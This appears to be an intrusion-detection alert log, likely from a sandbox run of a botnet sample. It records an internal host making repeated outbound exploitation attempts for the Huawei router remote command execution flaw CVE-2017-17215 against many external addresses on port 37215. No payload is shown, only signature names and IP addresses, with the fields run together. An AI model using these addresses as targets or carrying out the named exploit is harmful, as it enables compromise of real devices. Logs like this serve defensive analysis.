                                                        06/13/24-21:33:17.308303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447837215192.168.2.1441.10.41.58
                                                        06/13/24-21:32:28.043705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600237215192.168.2.14197.254.199.181
                                                        06/13/24-21:32:56.785820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154437215192.168.2.1441.57.119.57
                                                        06/13/24-21:33:02.954515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.1441.125.167.214
                                                        06/13/24-21:32:11.508361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899637215192.168.2.1441.219.202.226
                                                        06/13/24-21:33:09.087079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143237215192.168.2.14197.242.197.58
                                                        06/13/24-21:33:13.212152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539237215192.168.2.1441.179.96.217
                                                        06/13/24-21:31:59.177163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866237215192.168.2.14156.222.68.8
                                                        06/13/24-21:32:15.630491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622837215192.168.2.14197.55.222.29
                                                        06/13/24-21:32:36.248044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.1441.137.124.62
                                                        06/13/24-21:33:07.056472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483437215192.168.2.14197.131.193.248
                                                        06/13/24-21:32:40.378082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797237215192.168.2.14197.242.155.195
                                                        06/13/24-21:32:30.099077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811437215192.168.2.14197.247.169.87
                                                        06/13/24-21:32:34.200129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487237215192.168.2.14197.254.234.5
                                                        06/13/24-21:32:23.833977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428037215192.168.2.14197.184.60.213
                                                        06/13/24-21:32:56.755873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798237215192.168.2.14156.109.47.176
                                                        06/13/24-21:31:57.133595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176837215192.168.2.14156.116.60.230
                                                        06/13/24-21:32:13.544018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177837215192.168.2.14156.176.250.180
                                                        06/13/24-21:32:19.751906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.1441.93.253.192
                                                        06/13/24-21:32:21.801448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004037215192.168.2.1441.53.24.152
                                                        06/13/24-21:33:07.056864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579637215192.168.2.14156.130.20.244
                                                        06/13/24-21:33:00.889112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263037215192.168.2.14197.13.113.243
                                                        06/13/24-21:32:44.480890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578637215192.168.2.14156.1.14.243
                                                        06/13/24-21:32:58.823295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795237215192.168.2.14197.155.86.21
                                                        06/13/24-21:32:40.376784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607037215192.168.2.1441.140.210.56
                                                        06/13/24-21:32:30.094771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077837215192.168.2.14156.214.168.36
                                                        06/13/24-21:32:54.726034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290437215192.168.2.14197.172.226.75
                                                        06/13/24-21:33:09.108005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222437215192.168.2.1441.34.67.255
                                                        06/13/24-21:33:09.129861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052837215192.168.2.14197.217.211.223
                                                        06/13/24-21:33:13.227544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769437215192.168.2.14197.47.180.27
                                                        06/13/24-21:32:13.565576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541237215192.168.2.14197.144.125.241
                                                        06/13/24-21:32:01.248467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.14197.205.207.178
                                                        06/13/24-21:33:09.111199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459837215192.168.2.14156.162.21.227
                                                        06/13/24-21:32:25.973858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588837215192.168.2.14156.142.68.50
                                                        06/13/24-21:33:17.304236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444037215192.168.2.1441.144.214.251
                                                        06/13/24-21:32:40.357699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782037215192.168.2.14197.15.123.88
                                                        06/13/24-21:31:57.133543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309237215192.168.2.14197.241.25.6
                                                        06/13/24-21:32:46.508245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896437215192.168.2.1441.198.116.107
                                                        06/13/24-21:32:50.613664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864837215192.168.2.14197.178.222.61
                                                        06/13/24-21:32:54.706839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871637215192.168.2.14156.38.126.139
                                                        06/13/24-21:31:59.177374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021637215192.168.2.14156.112.130.200
                                                        06/13/24-21:32:30.076312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256437215192.168.2.14197.160.126.181
                                                        06/13/24-21:33:09.107609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601037215192.168.2.14156.8.58.97
                                                        06/13/24-21:32:07.401076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772237215192.168.2.14156.113.115.131
                                                        06/13/24-21:32:17.696063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586637215192.168.2.1441.141.36.140
                                                        06/13/24-21:33:11.158664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693637215192.168.2.14156.23.62.16
                                                        06/13/24-21:32:44.478314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.1441.3.102.57
                                                        06/13/24-21:32:50.611921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804237215192.168.2.1441.138.128.76
                                                        06/13/24-21:32:07.419999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307037215192.168.2.1441.80.32.222
                                                        06/13/24-21:32:28.027438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814437215192.168.2.14197.7.210.123
                                                        06/13/24-21:32:19.728124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420437215192.168.2.14197.187.44.188
                                                        06/13/24-21:33:02.908975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359637215192.168.2.14156.38.152.63
                                                        06/13/24-21:32:54.710385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535037215192.168.2.1441.242.62.80
                                                        06/13/24-21:32:21.786317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471437215192.168.2.14197.186.254.225
                                                        06/13/24-21:32:07.402784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836037215192.168.2.14197.20.17.61
                                                        06/13/24-21:33:09.091236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593037215192.168.2.14197.113.127.52
                                                        06/13/24-21:31:57.132899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970037215192.168.2.14156.118.1.139
                                                        06/13/24-21:32:07.401934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960037215192.168.2.14197.138.242.253
                                                        06/13/24-21:32:38.298853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083237215192.168.2.1441.175.180.148
                                                        06/13/24-21:32:54.710352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363237215192.168.2.1441.25.152.57
                                                        06/13/24-21:32:07.416901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852237215192.168.2.14197.216.178.229
                                                        06/13/24-21:33:11.157234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679437215192.168.2.1441.109.43.104
                                                        06/13/24-21:32:25.991036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933037215192.168.2.1441.60.78.49
                                                        06/13/24-21:32:36.245198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269637215192.168.2.14197.213.33.164
                                                        06/13/24-21:33:09.085947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453637215192.168.2.14197.104.8.78
                                                        06/13/24-21:32:17.695425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165837215192.168.2.14197.216.144.24
                                                        06/13/24-21:32:03.277854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432237215192.168.2.1441.49.50.178
                                                        06/13/24-21:33:07.061042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829837215192.168.2.14197.101.182.27
                                                        06/13/24-21:32:11.487511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524237215192.168.2.14197.143.219.190
                                                        06/13/24-21:32:38.298132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927037215192.168.2.1441.140.146.252
                                                        06/13/24-21:33:00.872409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768437215192.168.2.14156.6.147.192
                                                        06/13/24-21:32:01.242064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011237215192.168.2.1441.175.223.98
                                                        06/13/24-21:32:25.970678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581437215192.168.2.14197.200.21.156
                                                        06/13/24-21:33:07.042099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638637215192.168.2.14156.222.3.121
                                                        06/13/24-21:33:15.258272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390037215192.168.2.14197.210.197.32
                                                        06/13/24-21:32:34.215431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029437215192.168.2.1441.243.61.158
                                                        06/13/24-21:32:36.268913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429037215192.168.2.1441.164.250.22
                                                        06/13/24-21:32:54.711479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.14156.134.140.15
                                                        06/13/24-21:32:32.155758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482237215192.168.2.14197.187.54.175
                                                        06/13/24-21:33:07.041562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912237215192.168.2.1441.130.207.1
                                                        06/13/24-21:32:34.192872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250037215192.168.2.14156.162.73.141
                                                        06/13/24-21:32:21.801605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574037215192.168.2.14197.179.13.202
                                                        06/13/24-21:33:11.156371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551637215192.168.2.14197.56.189.169
                                                        06/13/24-21:32:30.100777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309037215192.168.2.14197.0.91.254
                                                        06/13/24-21:32:32.150371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710037215192.168.2.1441.159.227.229
                                                        06/13/24-21:32:40.374013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835637215192.168.2.1441.217.181.160
                                                        06/13/24-21:31:59.195185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977037215192.168.2.14156.30.164.95
                                                        06/13/24-21:32:54.711284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492037215192.168.2.14197.211.226.11
                                                        06/13/24-21:33:17.304884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897637215192.168.2.14197.123.63.167
                                                        06/13/24-21:33:13.210584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712637215192.168.2.1441.105.155.124
                                                        06/13/24-21:32:44.476297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.14156.202.20.229
                                                        06/13/24-21:32:03.276089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163437215192.168.2.1441.221.110.141
                                                        06/13/24-21:33:02.911500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003637215192.168.2.14156.25.147.94
                                                        06/13/24-21:31:59.174784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524037215192.168.2.14197.166.240.196
                                                        06/13/24-21:33:11.156853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768837215192.168.2.1441.172.59.21
                                                        06/13/24-21:33:11.181451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384837215192.168.2.14197.45.46.139
                                                        06/13/24-21:32:17.695385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925837215192.168.2.14197.15.119.201
                                                        06/13/24-21:32:40.372158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683037215192.168.2.14156.109.30.110
                                                        06/13/24-21:33:15.258672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058437215192.168.2.1441.150.97.178
                                                        06/13/24-21:32:34.215908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502037215192.168.2.14156.161.137.128
                                                        06/13/24-21:33:02.909554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201437215192.168.2.1441.207.143.122
                                                        06/13/24-21:32:01.224399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036237215192.168.2.14197.212.39.176
                                                        06/13/24-21:32:40.357114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248837215192.168.2.1441.54.159.133
                                                        06/13/24-21:32:13.566822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109637215192.168.2.1441.58.133.186
                                                        06/13/24-21:32:32.165019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868237215192.168.2.14156.73.8.238
                                                        06/13/24-21:32:30.124517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558437215192.168.2.14156.224.53.182
                                                        06/13/24-21:32:25.993785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086237215192.168.2.14156.41.154.31
                                                        06/13/24-21:32:17.671857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299837215192.168.2.14197.28.20.169
                                                        06/13/24-21:32:36.269241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843837215192.168.2.14156.147.130.207
                                                        06/13/24-21:32:48.552762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476237215192.168.2.1441.203.189.139
                                                        06/13/24-21:32:58.823847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743637215192.168.2.14197.216.114.250
                                                        06/13/24-21:32:19.749810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146237215192.168.2.1441.83.74.175
                                                        06/13/24-21:33:07.060701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295437215192.168.2.14197.130.228.0
                                                        06/13/24-21:33:09.113793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185237215192.168.2.1441.117.34.54
                                                        06/13/24-21:33:09.089977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596837215192.168.2.1441.236.109.163
                                                        06/13/24-21:32:50.630311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288837215192.168.2.1441.28.51.229
                                                        06/13/24-21:32:56.788962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086437215192.168.2.1441.137.204.23
                                                        06/13/24-21:32:09.438035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606037215192.168.2.1441.94.3.79
                                                        06/13/24-21:31:59.195337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619437215192.168.2.14156.66.12.61
                                                        06/13/24-21:32:11.508214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829437215192.168.2.1441.158.216.196
                                                        06/13/24-21:32:52.678591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455237215192.168.2.14197.4.200.211
                                                        06/13/24-21:33:09.110278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013237215192.168.2.1441.254.26.51
                                                        06/13/24-21:32:05.348912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591437215192.168.2.1441.139.237.1
                                                        06/13/24-21:33:09.107290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201037215192.168.2.14197.139.115.203
                                                        06/13/24-21:32:50.629856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018437215192.168.2.1441.130.44.3
                                                        06/13/24-21:32:01.221980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260437215192.168.2.14197.214.46.171
                                                        06/13/24-21:32:13.545004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615237215192.168.2.14197.16.164.175
                                                        06/13/24-21:32:19.750554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468037215192.168.2.14156.217.237.92
                                                        06/13/24-21:32:17.695061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260437215192.168.2.14197.72.199.240
                                                        06/13/24-21:33:15.270691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881637215192.168.2.1441.198.92.229
                                                        06/13/24-21:32:19.728528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510437215192.168.2.14197.95.141.212
                                                        06/13/24-21:31:59.176842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838437215192.168.2.14197.198.78.95
                                                        06/13/24-21:33:00.867032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361037215192.168.2.14156.157.192.134
                                                        06/13/24-21:32:58.820543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870037215192.168.2.1441.142.251.244
                                                        06/13/24-21:32:54.724757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674037215192.168.2.14156.136.230.204
                                                        06/13/24-21:33:07.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661037215192.168.2.14197.123.78.120
                                                        06/13/24-21:32:11.509336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.14156.159.213.51
                                                        06/13/24-21:32:34.192684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721837215192.168.2.1441.135.151.99
                                                        06/13/24-21:33:13.210776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632837215192.168.2.14156.53.62.148
                                                        06/13/24-21:32:13.565412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284837215192.168.2.14197.239.175.2
                                                        06/13/24-21:32:56.756663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808437215192.168.2.14156.176.200.65
                                                        06/13/24-21:32:44.453069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551637215192.168.2.14197.223.135.12
                                                        06/13/24-21:31:59.177190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.14156.203.240.233
                                                        06/13/24-21:32:09.439365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960437215192.168.2.14156.5.36.56
                                                        06/13/24-21:32:17.672061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395637215192.168.2.1441.19.253.57
                                                        06/13/24-21:32:17.678996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417237215192.168.2.14197.77.114.63
                                                        06/13/24-21:31:59.175137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966837215192.168.2.1441.185.24.48
                                                        06/13/24-21:31:57.092881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561437215192.168.2.14197.107.159.226
                                                        06/13/24-21:32:50.628959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901637215192.168.2.1441.72.56.116
                                                        06/13/24-21:32:58.841466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302037215192.168.2.1441.45.97.173
                                                        06/13/24-21:32:32.166466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.1441.110.209.4
                                                        06/13/24-21:32:25.968963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910037215192.168.2.1441.199.179.115
                                                        06/13/24-21:33:07.040984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545837215192.168.2.14197.18.160.178
                                                        06/13/24-21:33:13.214469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735037215192.168.2.14156.156.56.86
                                                        06/13/24-21:32:30.099410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382637215192.168.2.14197.83.2.236
                                                        06/13/24-21:32:38.317106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169037215192.168.2.14156.200.151.243
                                                        06/13/24-21:32:30.078824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553437215192.168.2.1441.175.207.61
                                                        06/13/24-21:32:19.731468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356637215192.168.2.14156.95.194.185
                                                        06/13/24-21:32:42.407303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962037215192.168.2.14156.63.83.96
                                                        06/13/24-21:32:15.610057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819637215192.168.2.1441.196.166.49
                                                        06/13/24-21:33:00.889053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768237215192.168.2.14156.162.115.188
                                                        06/13/24-21:32:34.191631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4645637215192.168.2.14156.145.9.72
                                                        06/13/24-21:32:34.198381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482437215192.168.2.1441.27.14.13
                                                        06/13/24-21:32:52.676512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324237215192.168.2.1441.44.143.240
                                                        06/13/24-21:32:52.654550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350037215192.168.2.14197.206.235.253
                                                        06/13/24-21:32:30.128549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966437215192.168.2.1441.249.247.34
                                                        06/13/24-21:32:56.759392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14156.216.247.154
                                                        06/13/24-21:32:30.123344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937837215192.168.2.1441.218.24.192
                                                        06/13/24-21:32:44.453861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574237215192.168.2.14197.180.159.45
                                                        06/13/24-21:32:38.323258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160237215192.168.2.14156.131.94.111
                                                        06/13/24-21:33:13.229177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352237215192.168.2.14156.162.69.204
                                                        06/13/24-21:32:30.075114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840437215192.168.2.14197.5.25.171
                                                        06/13/24-21:32:17.677085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140437215192.168.2.14156.155.63.255
                                                        06/13/24-21:32:28.042636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340237215192.168.2.14197.213.54.63
                                                        06/13/24-21:32:44.457978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976437215192.168.2.1441.231.164.167
                                                        06/13/24-21:33:09.101632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703037215192.168.2.1441.241.239.83
                                                        06/13/24-21:32:11.484534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.1441.98.8.247
                                                        06/13/24-21:32:34.213420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120037215192.168.2.14156.255.21.66
                                                        06/13/24-21:32:30.075673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762837215192.168.2.1441.67.67.97
                                                        06/13/24-21:32:36.268235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217837215192.168.2.1441.37.141.228
                                                        06/13/24-21:32:28.046271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121237215192.168.2.14156.76.207.74
                                                        06/13/24-21:32:28.024086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623037215192.168.2.14156.133.47.35
                                                        06/13/24-21:32:46.525473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355037215192.168.2.14197.244.187.104
                                                        06/13/24-21:32:52.679340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004837215192.168.2.14156.62.92.155
                                                        06/13/24-21:32:36.268500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629837215192.168.2.14197.199.52.76
